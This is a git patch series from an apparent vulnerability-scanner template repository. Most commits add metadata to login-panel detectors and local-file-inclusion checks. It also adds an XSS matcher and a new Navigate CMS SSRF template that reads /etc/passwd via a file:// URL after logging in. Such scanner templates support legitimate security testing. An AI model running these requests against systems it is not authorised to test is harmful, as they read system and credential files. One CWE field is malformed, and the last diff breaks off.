a/exposed-panels/strapi-documentation.yaml +++ b/exposed-panels/strapi-documentation.yaml @@ -1,10 +1,14 @@ id: strapi-documentation info: - name: Strapi Documentation + name: Strapi CMS Documentation Login Panel - Detect author: idealphase severity: info - description: Strapi CMS - documentation plugin from marketplace (Make the documentation endpoint private. By default, the access is public) + description: Strapi CMS Documentation login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: strapi,panel requests: @@ -32,3 +36,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/14 diff --git a/exposed-panels/strapi-panel.yaml b/exposed-panels/strapi-panel.yaml index a4067c3e4d..eee45dc228 100644 --- a/exposed-panels/strapi-panel.yaml +++ b/exposed-panels/strapi-panel.yaml @@ -1,9 +1,14 @@ id: strapi-panel info: - name: Strapi Login Panel + name: Strapi Admin Login Panel - Detect author: idealphase severity: info + description: Strapi admin login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,strapi,login requests: @@ -21,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/14 diff --git a/exposed-panels/stridercd-panel.yaml b/exposed-panels/stridercd-panel.yaml index 7c95118948..35de3dd210 100644 --- a/exposed-panels/stridercd-panel.yaml +++ b/exposed-panels/stridercd-panel.yaml @@ -1,12 +1,17 @@ id: stridercd-panel info: - name: StriderCD Panel + name: Strider CD Panel - Detect author: Adam Crosser severity: info + description: Strider CD panel was detected. reference: - https://github.com/Strider-CD/strider - https://strider-cd.github.io + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.favicon.hash:115295460 tags: panel,cicd,oss,stridercd,strider @@ -22,3 +27,5 @@ requests: - type: word words: - "Strider: Brilliant Continuous Deployment" + +# Enhanced by md on 2023/01/14 diff --git a/exposed-panels/submitty-login.yaml b/exposed-panels/submitty-login.yaml index b5d384b844..8c80ea22b4 100644 --- a/exposed-panels/submitty-login.yaml +++ b/exposed-panels/submitty-login.yaml @@ -1,9 +1,14 @@ id: submitty-login info: - name: Submitty Login Panel + name: Submitty Login Panel - Detect author: princechaddha severity: info + description: Submitty login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 reference: - https://github.com/Submitty/Submitty - https://rcos.io/ @@ -34,3 +39,5 @@ requests: group: 1 regex: - '\/Submitty\/Submitty\/releases\/tag\/([a-z0-9.]+)" target="_blank' + +# Enhanced by md on 2023/01/14 diff --git a/exposed-panels/subrion-login.yaml b/exposed-panels/subrion-login.yaml index 73f8fa5f30..8b91d3faa6 100644 --- a/exposed-panels/subrion-login.yaml +++ b/exposed-panels/subrion-login.yaml @@ -1,9 +1,14 @@ id: subrion-login info: - name: Subrion Admin Login Panel + name: Subrion Admin Panel Login Panel - Detect author: princechaddha severity: info + description: Subrion Admin Panel login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,subrion requests: @@ -30,3 +35,5 @@ requests: group: 1 regex: - "Subrion CMS ([a-z0-9.]+)
" + +# Enhanced by md on 2023/01/14 diff --git a/exposed-panels/sugarcrm-panel.yaml b/exposed-panels/sugarcrm-panel.yaml index c76645fdf8..03c6dcff45 100644 --- a/exposed-panels/sugarcrm-panel.yaml +++ b/exposed-panels/sugarcrm-panel.yaml @@ -1,9 +1,14 @@ id: sugarcrm-panel info: - name: Detect SugarCRM Panel + name: SugarCRM Login Panel - Detect author: johnk3r severity: info + description: SugarCRM login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:sugarcrm tags: sugarcrm,panel @@ -25,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/14 diff --git a/exposed-panels/sungrow-logger1000-detect.yaml b/exposed-panels/sungrow-logger1000-detect.yaml index 3b0f3c7312..317b45e7ca 100644 --- a/exposed-panels/sungrow-logger1000-detect.yaml +++ b/exposed-panels/sungrow-logger1000-detect.yaml @@ -1,11 +1,16 @@ id: sungrow-logger1000-detect info: - name: SUNGROW Logger1000 (Solar Energy Inverter Monitoring Devices) Panel Detect + name: SUNGROW Logger1000 Panel - Detect author: gy741 severity: info + description: SUNGROW (Solar Energy Inverter Monitoring Devices) Logger1000 panel was detected. reference: - https://www.europe-solarstore.com/download/Sungrow/Sungrow-data-logger-1000_1000B-usert-manual.pdf + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:logger html:"htmlWebpackPlugin.options.title" @@ -33,3 +38,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/14 diff --git a/exposed-panels/superadmin-ui-panel.yaml b/exposed-panels/superadmin-ui-panel.yaml index 0c2218e562..a65057e570 100644 --- a/exposed-panels/superadmin-ui-panel.yaml +++ b/exposed-panels/superadmin-ui-panel.yaml @@ -1,9 +1,14 @@ id: superadmin-ui-panel info: - name: Superadmin UI Login + name: SuperAdmin Login Panel - Detect author: Hardik-Solanki severity: info + description: SuperAdmin login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"Superadmin UI - 4myhealth" @@ -23,3 +28,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/14 diff --git a/exposed-panels/supermicro-bmc-panel.yaml b/exposed-panels/supermicro-bmc-panel.yaml index ab3b6ff63c..5489065e32 100644 --- a/exposed-panels/supermicro-bmc-panel.yaml +++ b/exposed-panels/supermicro-bmc-panel.yaml @@ -1,14 +1,18 @@ id: supermicro-bmc-panel info: - name: Supermicro BMC Login Panel + name: Supermicro BMC Login Panel - Detect author: idealphase severity: info - description: baseboard management controller (BMC) which provides an efficient interface that enables IT administrators to manage the health of the server through temperature/voltage readings and common server maintenance tasks like BIOS upgrades and debug OS remotely through KVM consoles. + description: Supermicro BMC login panel was detected. reference: - https://www.supermicro.com/en - https://www.supermicro.com/en/solutions/management-software/bmc-resources - https://www.supermicro.com/white_paper/IPMI_white_paper.pdf + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"Supermicro BMC Login" google-query: intitle:"Supermicro BMC Login" @@ -29,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/14 diff --git a/exposed-panels/superset-login.yaml b/exposed-panels/superset-login.yaml index fbbd421413..b6e4822dcc 100644 --- a/exposed-panels/superset-login.yaml +++ b/exposed-panels/superset-login.yaml @@ -1,9 +1,14 @@ id: superset-login info: - name: Superset Login + name: Apache Superset Login Panel - Detect author: DhiyaneshDk severity: info + description: Apache Superset login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.favicon.hash:1582430156 @@ -33,3 +38,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/14 diff --git a/exposed-panels/supervpn-panel.yaml b/exposed-panels/supervpn-panel.yaml index ef939f6a7f..fbb200ba8f 100644 --- a/exposed-panels/supervpn-panel.yaml +++ b/exposed-panels/supervpn-panel.yaml @@ -1,9 +1,14 @@ id: supervpn-detect info: - name: SuperVPN panel detect + name: SuperVPN Login Panel - Detect author: organiccrap severity: info + description: SuperVPN login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel requests: @@ -15,3 +20,5 @@ requests: words: - "Sign In-SuperVPN" part: body + +# Enhanced by md on 2023/01/14 diff --git a/vulnerabilities/apache/apache-solr-file-read.yaml b/vulnerabilities/apache/apache-solr-file-read.yaml index be0bac2d85..8b66ef3eb0 100644 --- a/vulnerabilities/apache/apache-solr-file-read.yaml +++ b/vulnerabilities/apache/apache-solr-file-read.yaml @@ -1,7 +1,7 @@ id: apache-solr-file-read info: - name: Apache Solr <= 8.8.1 - Local File Inclusion + name: Apache Solr <=8.8.1 - Local File Inclusion author: DhiyaneshDk,philippedelteil severity: high description: Apache Solr versions prior to and including 8.8.1 are vulnerable to local file inclusion. @@ -57,3 +57,5 @@ requests: regex: - '"name"\:"(.*?)"' internal: true + +# Enhanced by mp on 2023/01/15 diff --git a/vulnerabilities/j2ee/liferay-resource-leak.yaml b/vulnerabilities/j2ee/liferay-resource-leak.yaml index 54b172ba94..a418408420 100644 --- a/vulnerabilities/j2ee/liferay-resource-leak.yaml +++ b/vulnerabilities/j2ee/liferay-resource-leak.yaml @@ -1,14 +1,18 @@ id: liferay-resource-leak info: - name: Liferay - Resource leakage through I18nServlet + name: Liferay - Local File Inclusion author: DhiyaneshDk severity: high description: | - I18n Servlet leaks information by sending an HTTP request to /[language]/[resource];.js (also .jsp works). + Liferay is vulnerable to local file inclusion in the I18n Servlet because it leaks information via sending an HTTP request to /[language]/[resource];.js (also .jsp works). remediation: Update Liferay to the latest version reference: - https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LiferayI18nServletResourceLeaks.java + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 metadata: verified: true shodan-query: title:"Liferay" @@ -36,3 +40,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2023/01/15 diff --git a/vulnerabilities/other/crystal-live-server-lfi.yaml b/vulnerabilities/other/crystal-live-server-lfi.yaml index 8e56585214..09717c7fa4 100644 --- a/vulnerabilities/other/crystal-live-server-lfi.yaml +++ b/vulnerabilities/other/crystal-live-server-lfi.yaml @@ -1,10 +1,15 @@ id: crystal-live-server-lfi info: - name: Crystal Live HTTP Server 6.01 - Directory Traversal + name: Crystal Live HTTP Server 6.01 - Local File Inclusion author: 0x_Akoko severity: high + description: Crystal Live HTTP Server 6.01 is vulnerable to local file inclusion. reference: https://cxsecurity.com/issue/WLB-2019110127 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 tags: lfi,crystal requests: @@ -20,3 +25,5 @@ requests: - "fonts" - "extensions" condition: and + +# Enhanced by mp on 2023/01/15 diff --git a/vulnerabilities/other/kavita-lfi.yaml b/vulnerabilities/other/kavita-lfi.yaml index 6bc32e8cf3..b5fcb55af3 100644 --- a/vulnerabilities/other/kavita-lfi.yaml +++ b/vulnerabilities/other/kavita-lfi.yaml @@ -1,17 +1,21 @@ id: kavita-lfi info: - name: Kavita - Path Traversal + name: Kavita - Local File Inclusion author: arafatansari severity: medium description: | - kareadita/kavita allows Path Traversal by abusing the filename parameter of the /api/image/cover-upload. + Kavita - Path Traversal is vulnerable to local file inclusion via abusing the Path Traversal filename parameter of the /api/image/cover-upload. reference: - https://huntr.dev/bounties/2eef332b-65d2-4f13-8c39-44a8771a6f18/ metadata: verified: true shodan-query: http.html:"kavita" tags: kavita,lfi,huntr + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 requests: - method: GET @@ -31,3 +35,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2023/01/15 diff --git a/vulnerabilities/other/wapples-firewall-lfi.yaml b/vulnerabilities/other/wapples-firewall-lfi.yaml index aa69c6718b..8f085b2a5e 100644 --- a/vulnerabilities/other/wapples-firewall-lfi.yaml +++ b/vulnerabilities/other/wapples-firewall-lfi.yaml @@ -1,11 +1,16 @@ id: wapples-firewall-lfi info: - name: Wapples Web Application Firewall - Arbitrary File Download + name: Wapples Web Application Firewall - Local File Inclusion author: For3stCo1d severity: high + description: Wapples Web Application Firewall is vulnerable to local file inclusion. reference: - https://medium.com/@_sadshade/wapples-web-application-firewall-multiple-vulnerabilities-35bdee52c8fb + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 metadata: verified: true shodan-query: http.title:"Intelligent WAPPLES" @@ -37,3 +42,5 @@ requests: - type: regex regex: - "root:[x*]:0:0" + +# Enhanced by mp on 2023/01/15 diff --git a/vulnerabilities/thinkphp/thinkphp6-lang-lfi.yaml b/vulnerabilities/thinkphp/thinkphp6-lang-lfi.yaml index 36d1dd8e2a..6492992c4c 100644 --- a/vulnerabilities/thinkphp/thinkphp6-lang-lfi.yaml +++ b/vulnerabilities/thinkphp/thinkphp6-lang-lfi.yaml @@ -1,13 +1,17 @@ id: thinkphp6-lang-lfi info: - name: Thinkphp Lang - LFI + name: Thinkphp Lang - Local File Inclusion author: kagamigawa severity: high description: | - Thinkphp,v6.0.1~v6.0.13, v5.0.x~v5.1.41, v5.0.0~v5.0.24 vulnerable to LFI. + Thinkphp Lang 6.0.1~v6.0.13, v5.0.x~v5.1.41, v5.0.0~v5.0.24 is vulnerable to local file inclusion. reference: - https://tttang.com/archive/1865/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 metadata: verified: true shodan-query: title:"Thinkphp" @@ -33,3 +37,5 @@ requests: - type: status status: - 500 + +# Enhanced by mp on 2023/01/15 diff --git a/vulnerabilities/videoxpert-lfi.yaml b/vulnerabilities/videoxpert-lfi.yaml index 3c6bcef333..8c524dfffa 100644 --- a/vulnerabilities/videoxpert-lfi.yaml +++ b/vulnerabilities/videoxpert-lfi.yaml @@ -1,13 +1,17 @@ id: videoxpert-lfi info: - name: Schneider Electric Pelco VideoXpert Core Admin Portal - Directory Traversal + name: Schneider Electric Pelco VideoXpert Core Admin Portal - Local File Inclusion author: 0x_akoko severity: high - description: Pelco VideoXpert suffers from a directory traversal vulnerability. Exploiting this issue will allow an unauthenticated attacker to view arbitrary files within the context of the web server. + description: Schneider Electric Pelco VideoXpert Core Admin Portal suffers from local file inclusion. Exploiting this issue will allow an unauthenticated attacker to view arbitrary files within the context of the web server. reference: - https://packetstormsecurity.com/files/143317/Schneider-Electric-Pelco-VideoXpert-Core-Admin-Portal-Directory-Traversal.html - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5419.php + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22Directory-Traversal.html metadata: shodan-query: title:"VideoXpert" tags: schneider,pelco,packetstorm,lfi,videoxpert @@ -30,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2023/01/15 diff --git a/vulnerabilities/webp-server-go/webp-server-go-lfi.yaml b/vulnerabilities/webp-server-go/webp-server-go-lfi.yaml index 239b8e49ba..7f46d115ba 100644 --- a/vulnerabilities/webp-server-go/webp-server-go-lfi.yaml +++ b/vulnerabilities/webp-server-go/webp-server-go-lfi.yaml @@ -4,8 +4,13 @@ info: name: Webp server go - Local File Inclusion author: pikpikcu severity: high + description: Webp server go is vulnerable to local file inclusion. reference: - https://github.com/webp-sh/webp_server_go/issues/92 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 metadata: verified: true shodan-query: http.html:"Webp" @@ -25,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2023/01/15 diff --git a/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml b/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml index ff4d27be3a..602f43df46 100644 --- a/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml +++ b/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml @@ -1,15 +1,19 @@ id: unauth-lfd-zhttpd info: - name: zhttpd - Unauthenticated Local File Disclosure + name: zhttpd - Local File Inclusion author: EvergreenCartoons severity: high description: | - An endpoint in zhttpd can be used to expose system files including "/etc/passwd" and "/etc/shadow". This endpoint is accessible without prior login. An attacker can read all files on the system by using this endpoint. + zhttpd is vulnerable to unauthenticated local inclusion including privileged files such as /etc/shadow. An attacker can read all files on the system by using this endpoint. reference: - https://sec-consult.com/blog/detail/enemy-within-unauthenticated-buffer-overflows-zyxel-routers/ - https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-multiple-zyxel-devices/ - https://github.com/rapid7/metasploit-framework/pull/17388 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 metadata: verified: "true" shodan-query: http.html:"VMG1312-B10D" @@ -37,3 +41,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2023/01/15 From 859a5eb0a7f5b0f0e1e9d1dc944b3a7d5ff36c3d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 16 Jan 2023 17:41:32 +0000 Subject: [PATCH 0937/1133] Auto Generated New Template Addition List [Mon Jan 16 17:41:32 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 69b8bbb972..c37c57d987 100644 --- a/.new-additions +++ b/.new-additions @@ -30,6 +30,7 @@ technologies/default-symfony-page.yaml technologies/default-tengine-page.yaml technologies/monstracms-detect.yaml technologies/ntop-detect.yaml +technologies/wordpress/plugins/otter-blocks.yaml technologies/wordpress/plugins/webp-express.yaml token-spray/api-ipdata.yaml token-spray/api-ipinfo.yaml From 66c39d5d077b2c9f8f4421e588ae6ef341cce645 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 16 Jan 2023 23:11:46 +0530 Subject: [PATCH 0938/1133] fix --- misconfiguration/aem/aem-childrenlist-xss.yaml | 11 ++++++++++- 1 file changed, 10 insertions(+), 1 deletion(-) diff --git a/misconfiguration/aem/aem-childrenlist-xss.yaml b/misconfiguration/aem/aem-childrenlist-xss.yaml index 76c4c96c89..15e2670a53 100644 --- a/misconfiguration/aem/aem-childrenlist-xss.yaml +++ b/misconfiguration/aem/aem-childrenlist-xss.yaml @@ -33,8 +33,17 @@ requests: - type: word part: body - name: html + name: html_injection words: - '

please authenticate

' - 'data-coral-columnview-id' condition: and + + - type: word + part: content_type + words: + - 'text/html' + + - type: status + status: + - 200 From f2714b2ac32a99ed124b6f3a406a663e5a54518b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 16 Jan 2023 23:18:47 +0530 Subject: [PATCH 0939/1133] fix --- misconfiguration/aem/aem-childrenlist-xss.yaml | 10 +++------- 1 file changed, 3 insertions(+), 7 deletions(-) diff --git a/misconfiguration/aem/aem-childrenlist-xss.yaml b/misconfiguration/aem/aem-childrenlist-xss.yaml index 15e2670a53..efbb28a5c9 100644 --- a/misconfiguration/aem/aem-childrenlist-xss.yaml +++ b/misconfiguration/aem/aem-childrenlist-xss.yaml @@ -21,23 +21,19 @@ requests: - "{{BaseURL}}/{{rand_base(4)}}

please%20authenticate

.childrenlist.html" stop-at-first-match: true - matchers-condition: or + matchers-condition: and matchers: - type: word part: body - name: xss words: - '' - - 'data-coral-columnview-id' - condition: and + - '

please authenticate

' + condition: or - type: word part: body - name: html_injection words: - - '

please authenticate

' - 'data-coral-columnview-id' - condition: and - type: word part: content_type From 3e002c3d54be62dacc4712bfeade40e09279b21b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 16 Jan 2023 17:52:49 +0000 Subject: [PATCH 0942/1133] Auto Generated New Template Addition List [Mon Jan 16 17:52:48 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index c37c57d987..208c19e4c6 100644 --- a/.new-additions +++ b/.new-additions @@ -9,6 +9,7 @@ exposed-panels/freepbx-administration-panel.yaml exposed-panels/ldap-account-manager-panel.yaml exposed-panels/modoboa-panel.yaml exposed-panels/monstra-admin-panel.yaml +exposed-panels/saltgui-panel.yaml exposed-panels/storybook-panel.yaml exposures/configs/ovpn-config-exposed.yaml exposures/mobiproxy-dashboard.yaml From 4e05c4b91b41868afa45129434dda4b2a8445617 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 16 Jan 2023 17:57:19 +0000 Subject: [PATCH 0943/1133] Auto Generated CVE annotations [Mon Jan 16 17:57:19 UTC 2023] :robot: --- cves/2022/CVE-2022-31793.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/cves/2022/CVE-2022-31793.yaml b/cves/2022/CVE-2022-31793.yaml index 7c945993a8..23797e44cc 100644 --- a/cves/2022/CVE-2022-31793.yaml +++ b/cves/2022/CVE-2022-31793.yaml @@ -9,6 +9,8 @@ info: reference: - https://derekabdine.com/blog/2022-arris-advisory.html - https://nvd.nist.gov/vuln/detail/CVE-2022-31793 + - https://derekabdine.com/blog/2022-arris-advisory + - https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/08/millions-of-arris-routers-are-vulnerable-to-path-traversal-attacks/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 From cdc5bc3ece1f027ea98f4b0de07017a4a7f3bbae Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 17 Jan 2023 04:02:45 +0000 Subject: [PATCH 0944/1133] Auto WordPress Plugins Update [Tue Jan 17 04:02:45 UTC 2023] :robot: --- helpers/wordpress/plugins/cookie-notice.txt | 2 +- helpers/wordpress/plugins/google-site-kit.txt | 2 +- helpers/wordpress/plugins/jetpack.txt | 2 +- helpers/wordpress/plugins/limit-login-attempts-reloaded.txt | 2 +- helpers/wordpress/plugins/siteorigin-panels.txt | 2 +- .../plugins/woocommerce-pdf-invoices-packing-slips.txt | 2 +- 6 files changed, 6 insertions(+), 6 deletions(-) diff --git a/helpers/wordpress/plugins/cookie-notice.txt b/helpers/wordpress/plugins/cookie-notice.txt index ab6d27898c..26f8b8bcdf 100644 --- a/helpers/wordpress/plugins/cookie-notice.txt +++ b/helpers/wordpress/plugins/cookie-notice.txt @@ -1 +1 @@ -2.4.4 \ No newline at end of file +2.4.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-site-kit.txt b/helpers/wordpress/plugins/google-site-kit.txt index e85d689182..15b5f6b671 100644 --- a/helpers/wordpress/plugins/google-site-kit.txt +++ b/helpers/wordpress/plugins/google-site-kit.txt @@ -1 +1 @@ -1.90.1 \ No newline at end of file +1.92.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/jetpack.txt b/helpers/wordpress/plugins/jetpack.txt index ae27ab17be..393b190a16 100644 --- a/helpers/wordpress/plugins/jetpack.txt +++ b/helpers/wordpress/plugins/jetpack.txt @@ -1 +1 @@ -11.7 \ No newline at end of file +11.7.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt b/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt index fde7ac6392..32d9065106 100644 --- a/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt +++ b/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt @@ -1 +1 @@ -2.25.10 \ No newline at end of file +2.25.11 \ No newline at end of file diff --git a/helpers/wordpress/plugins/siteorigin-panels.txt b/helpers/wordpress/plugins/siteorigin-panels.txt index 29e5a3bd47..b341aa021e 100644 --- a/helpers/wordpress/plugins/siteorigin-panels.txt +++ b/helpers/wordpress/plugins/siteorigin-panels.txt @@ -1 +1 @@ -2.20.3 \ No newline at end of file +2.20.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt b/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt index c4a602db6e..0fa4ae4890 100644 --- a/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt +++ b/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt @@ -1 +1 @@ -3.2.6 \ No newline at end of file +3.3.0 \ No newline at end of file From bee88cd3ac3d031b6c73d83a6f3a071a2cb23a0a Mon Sep 17 00:00:00 2001 From: Abhinav Gaur <55808946+theabhinavgaur@users.noreply.github.com> Date: Tue, 17 Jan 2023 09:48:15 +0530 Subject: [PATCH 0945/1133] Create CVE-2022-28117.yaml --- cves/2022/CVE-2022-28117.yaml | 75 +++++++++++++++++++++++++++++++++++ 1 file changed, 75 insertions(+) create mode 100644 cves/2022/CVE-2022-28117.yaml diff --git a/cves/2022/CVE-2022-28117.yaml b/cves/2022/CVE-2022-28117.yaml new file mode 100644 index 0000000000..c2bf5569f3 --- /dev/null +++ b/cves/2022/CVE-2022-28117.yaml @@ -0,0 +1,75 @@ +id: CVE-2022-28117 + +info: + name: Navigate CMS 2.9.4 - Server-Side Request Forgery (SSRF) (Authenticated) + author: theabhinavgaur + severity: medium + description: | + A Server-Side Request Forgery (SSRF) in feed_parser class of Navigate CMS v2.9.4 allows remote attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the feed parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-28117 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-28117 + classification: + cve-id: CVE-2022-28117 + cwe-id: CWE-918 + metadata: + verified: "true" + tags: cve,cve2022,ssrf,cms,Navigate,authenticated + + +requests: + - raw: + - | + GET /navigate/navigate/login.php HTTP/1.1 + Host: {{Hostname}} + + - | + POST /navigate/navigate/login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------123456789012345678901234567890 + + -----------------------------123456789012345678901234567890 + Content-Disposition: form-data; name="login-username" + + {{username}} + -----------------------------123456789012345678901234567890 + Content-Disposition: form-data; name="csrf_token" + + {{csrf_token}} + -----------------------------123456789012345678901234567890 + Content-Disposition: form-data; name="login-password" + + {{password}} + -----------------------------123456789012345678901234567890 + + - | + POST /navigate/navigate/navigate.php?fid=dashboard&act=json&oper=feed HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + limit=5&language=en&url=file:///etc/passwd + + - | + GET /navigate/navigate/private/1/cache/0f1726ba83325848d47e216b29d5ab99.feed HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "root:/root:/bin/bash" + + - type: status + status: + - 200 + + extractors: + - type: regex + name: csrf_token + part: body + internal: true + group: 1 + regex: + - 'csrf_token" value="([a-f0-9]{64})' From 3c23c2cb9cd4a0eca231002dee1a98ecbfa43ca4 Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Tue, 17 Jan 2023 00:08:21 -0500 Subject: [PATCH 0946/1133] Create froxlor-database-backup-file.yaml --- .../froxlor-database-backup-file.yaml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 misconfiguration/froxlor-database-backup-file.yaml diff --git a/misconfiguration/froxlor-database-backup-file.yaml b/misconfiguration/froxlor-database-backup-file.yaml new file mode 100644 index 0000000000..4cc2cce56c --- /dev/null +++ b/misconfiguration/froxlor-database-backup-file.yaml @@ -0,0 +1,34 @@ +id: froxlor-database-backup-file + +info: + name: Froxlor Database Backup File + author: tess + severity: low + metadata: + verified: true + shodan-dork: title:"Froxlor Server Management Panel" + tags: froxlor,backup + +requests: + - method: GET + path: + - '{{BaseURL}}/install/froxlor.sql' + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "DROP TABLE IF EXISTS `ftp_groups`" + - "CREATE TABLE" + condition: and + + - type: word + part: header + words: + - "application/sql" + + - type: status + status: + - 200 From 9fc8c4996867b9f29ccff262443d6d124a8592f6 Mon Sep 17 00:00:00 2001 From: Abhinav Gaur <55808946+theabhinavgaur@users.noreply.github.com> Date: Tue, 17 Jan 2023 10:48:35 +0530 Subject: [PATCH 0947/1133] Update CVE-2022-28117.yaml --- cves/2022/CVE-2022-28117.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2022/CVE-2022-28117.yaml b/cves/2022/CVE-2022-28117.yaml index c2bf5569f3..14b99fdad6 100644 --- a/cves/2022/CVE-2022-28117.yaml +++ b/cves/2022/CVE-2022-28117.yaml @@ -20,11 +20,11 @@ info: requests: - raw: - | - GET /navigate/navigate/login.php HTTP/1.1 + GET /navigate/login.php HTTP/1.1 Host: {{Hostname}} - | - POST /navigate/navigate/login.php HTTP/1.1 + POST /navigate/login.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=---------------------------123456789012345678901234567890 @@ -43,14 +43,14 @@ requests: -----------------------------123456789012345678901234567890 - | - POST /navigate/navigate/navigate.php?fid=dashboard&act=json&oper=feed HTTP/1.1 + POST /navigate/navigate.php?fid=dashboard&act=json&oper=feed HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; 